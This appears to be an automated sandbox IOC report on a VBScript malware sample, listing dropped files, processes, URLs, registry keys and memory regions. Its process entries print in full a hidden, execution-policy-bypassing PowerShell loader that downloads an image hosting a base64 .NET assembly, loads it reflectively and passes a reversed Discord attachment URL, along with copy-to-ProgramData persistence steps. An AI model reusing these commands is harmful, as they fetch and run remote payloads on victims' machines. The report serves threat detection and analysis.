IOC Report
kam.vbs

loading gif

Files

File Path
Type
Category
Malicious
kam.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\cognitivo.vbs
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\c2iY1[1].txt
ASCII text, with very long lines (12075), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fz5flur.noa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avzzzgbe.r11.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmnhme0j.zvz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clb53lak.cif.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcfdsidh.szd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sexmt3mt.pll.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreNgDgTre4DgTreDkDgTreMQDgTreyDgTreDUDgTreMgDgTrexDgTreGQDgTreOQDgTre1DgTreGUDgTreNQDgTrewDgTreDQDgTreMQDgTreyDgTreGQDgTreMwDgTre1DgTreDUDgTreZDgTreDgTre1DgTreDIDgTreMDgTreBjDgTreGYDgTreZDgTreBlDgTreDIDgTreMQBlDgTreGQDgTreMDgTreBkDgTreDEDgTreZQDgTrexDgTreDUDgTreNgDgTrewDgTreDkDgTreZgBlDgTreDIDgTreMgDgTrezDgTreDMDgTreZgBjDgTreGIDgTreMDgTreDgTre2DgTreDUDgTreMgBmDgTreDQDgTreNwDgTre1DgTreDUDgTreYwBjDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGMDgTreZQDgTrexDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGMDgTreNgDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrebQBhDgTreGsDgTreLwDgTre4DgTreDEDgTreMwDgTre4DgTreDQDgTreMQDgTre3DgTreDQDgTreNwDgTreyDgTreDgDgTreNQDgTrewDgTreDIDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://paste.ee/d/c2iY1
188.114.96.3
malicious
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
188.114.96.3
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
https://paste.ee/
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://paste.ee/d/c2iY1h
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://paste.ee/d/c2iY1l
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://paste.ee/d/c2iY18
unknown
http://uploaddeimagens.com.br
unknown
https://paste.ee/d/c2iY14
unknown
https://paste.ee/d/c2iY1t
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
https://cdn.discordapp.com/attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986&
162.159.134.233
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
malicious
uploaddeimagens.com.br
188.114.96.3
malicious
cdn.discordapp.com
162.159.134.233

IPs

IP
Domain
Country
Malicious
188.114.96.3
paste.ee
European Union
malicious
162.159.134.233
cdn.discordapp.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
E44EAFF000
unkown
page read and write
185E687F000
heap
page read and write
1B7D78BA000
trusted library allocation
page read and write
141D2E8E000
heap
page read and write
185E93E6000
heap
page read and write
CEAC7E000
stack
page read and write
141D307E000
heap
page read and write
1435A04C000
heap
page read and write
979AE3E000
stack
page read and write
185E687D000
heap
page read and write
25D791F7000
heap
page execute and read and write
CEB2FB000
stack
page read and write
1B7D5440000
heap
page read and write
141D2E83000
heap
page read and write
1B7D784E000
trusted library allocation
page read and write
25D1006D000
trusted library allocation
page read and write
1B7D7A08000
trusted library allocation
page read and write
7FFD345C0000
trusted library allocation
page read and write
CEAE7E000
stack
page read and write
141D2F6E000
heap
page read and write
185E93B0000
heap
page read and write
185E8BA0000
heap
page read and write
141D101D000
heap
page read and write
185E88FD000
heap
page read and write
141D11D5000
heap
page read and write
185E920E000
heap
page read and write
141D2EC7000
heap
page read and write
1435D9CD000
heap
page read and write
7FFD34446000
trusted library allocation
page execute and read and write
25D77593000
heap
page read and write
1435BF50000
heap
page read and write
1435BE84000
heap
page read and write
141D2F54000
heap
page read and write
185E8837000
heap
page read and write
1B7D75B0000
trusted library allocation
page read and write
141D2F64000
heap
page read and write
185E85D5000
heap
page read and write
1435BF47000
heap
page read and write
185E93EF000
heap
page read and write
25D10011000
trusted library allocation
page read and write
13F94390000
heap
page read and write
185E9268000
heap
page read and write
1B7D5410000
heap
page read and write
1435A0F5000
heap
page read and write
141D2E80000
heap
page read and write
185E6895000
heap
page read and write
185E93C9000
heap
page read and write
25D00047000
trusted library allocation
page read and write
141D2F79000
heap
page read and write
1435BFC3000
heap
page read and write
185E8DB0000
trusted library allocation
page read and write
E44ECFE000
stack
page read and write
7FFD34590000
trusted library allocation
page read and write
141D2EF5000
heap
page read and write
1435C05C000
heap
page read and write
2F0C3FF000
stack
page read and write
185E6805000
heap
page read and write
7FFD344E0000
trusted library allocation
page read and write
25D794C7000
heap
page read and write
185E687D000
heap
page read and write
1B7D7262000
heap
page read and write
1435BE69000
heap
page read and write
141D2EB8000
heap
page read and write
1B7D7313000
heap
page read and write
141D2F64000
heap
page read and write
1B7D74D6000
trusted library allocation
page read and write
1435BE73000
heap
page read and write
185E93BE000
heap
page read and write
141D2F6C000
heap
page read and write
141D2F81000
heap
page read and write
185E88FF000
heap
page read and write
1435A0EA000
heap
page read and write
185E883D000
heap
page read and write
7FFD34550000
trusted library allocation
page execute and read and write
185E88C1000
heap
page read and write
25D775AD000
heap
page read and write
7FFD34660000
trusted library allocation
page read and write
185E8633000
heap
page read and write
141D1001000
heap
page read and write
141D0FF1000
heap
page read and write
979AFBC000
stack
page read and write
25D79550000
heap
page read and write
1435A0C2000
heap
page read and write
979AA7E000
stack
page read and write
141D0FF1000
heap
page read and write
1435BF4B000
heap
page read and write
1B7D7240000
heap
page read and write
13F941E0000
heap
page read and write
141D2F67000
heap
page read and write
13FA62AD000
trusted library allocation
page read and write
185E8828000
heap
page read and write
25D796E0000
heap
page read and write
E44EEBF000
stack
page read and write
13F95D46000
heap
page read and write
7FFD34420000
trusted library allocation
page execute and read and write
25D775D4000
heap
page read and write
25332FF000
stack
page read and write
979A4D3000
stack
page read and write
E44EE78000
stack
page read and write
1435BF34000
heap
page read and write
13F962C2000
trusted library allocation
page read and write
185E67DB000
heap
page read and write
185E85D8000
heap
page read and write
1B7EF462000
heap
page read and write
7FFD34580000
trusted library allocation
page read and write
185E687D000
heap
page read and write
185E687F000
heap
page read and write
1435A37C000
heap
page read and write
13F9665A000
trusted library allocation
page read and write
141D2F35000
heap
page read and write
25331FE000
stack
page read and write
185E8633000
heap
page read and write
141D2F2D000
heap
page read and write
1B7D5200000
heap
page read and write
7FFD343FC000
trusted library allocation
page execute and read and write
185E92AB000
heap
page read and write
141D0F85000
heap
page read and write
1B7D5480000
heap
page read and write
CEAEF9000
stack
page read and write
141D0F50000
heap
page read and write
1B7D78DD000
trusted library allocation
page read and write
185E93CF000
heap
page read and write
1B7D5269000
heap
page read and write
141D2F79000
heap
page read and write
7FFD34362000
trusted library allocation
page read and write
1435BF34000
heap
page read and write
185E92AB000
heap
page read and write
1B7D5273000
heap
page read and write
13F94290000
heap
page read and write
185E92AB000
heap
page read and write
13F94198000
heap
page read and write
1435BED0000
heap
page read and write
1B7D7B80000
trusted library allocation
page read and write
E44EFB9000
stack
page read and write
7FFD34630000
trusted library allocation
page read and write
141D2ECB000
heap
page read and write
1435BF4E000
heap
page read and write
25D77597000
heap
page read and write
185E8633000
heap
page read and write
25D774C0000
heap
page read and write
1435BF25000
heap
page read and write
185E88D5000
heap
page read and write
185E6895000
heap
page read and write
1435A0EA000
heap
page read and write
141D11D9000
heap
page read and write
7FFD34660000
trusted library allocation
page read and write
7FFD34426000
trusted library allocation
page execute and read and write
185E67B3000
heap
page read and write
185E8DA0000
heap
page read and write
227D9FF000
stack
page read and write
141D3124000
heap
page read and write
185E85CD000
heap
page read and write
7FFD34500000
trusted library allocation
page execute and read and write
1B7D7556000
trusted library allocation
page read and write
E44EB7F000
stack
page read and write
141D2F3C000
heap
page read and write
979AB3E000
unkown
page read and write
7FFD345B0000
trusted library allocation
page read and write
141D2E8E000
heap
page read and write
141D2EA0000
heap
page read and write
7FFD3436D000
trusted library allocation
page execute and read and write
185E860E000
heap
page read and write
13FA6F36000
trusted library allocation
page read and write
185E85E1000
heap
page read and write
7FFD34620000
trusted library allocation
page read and write
185E8800000
heap
page read and write
25D7948C000
heap
page read and write
25D79473000
heap
page read and write
13F9C739000
trusted library allocation
page read and write
1435BF61000
heap
page read and write
141D2F79000
heap
page read and write
1435BE93000
heap
page read and write
141D0F70000
heap
page read and write
979A9FE000
stack
page read and write
1B7D73D0000
heap
page execute and read and write
7FFD34650000
trusted library allocation
page read and write
185E882E000
heap
page read and write
185E8635000
heap
page read and write
25D774E0000
heap
page read and write
185E9309000
heap
page read and write
1B7D7297000
heap
page read and write
25D79630000
heap
page execute and read and write
2532FFE000
stack
page read and write
185E9345000
heap
page read and write
141D2E82000
heap
page read and write
185E89E0000
heap
page read and write
185E88C1000
heap
page read and write
1B7E744F000
trusted library allocation
page read and write
979AF3E000
stack
page read and write
7FFD3435B000
trusted library allocation
page read and write
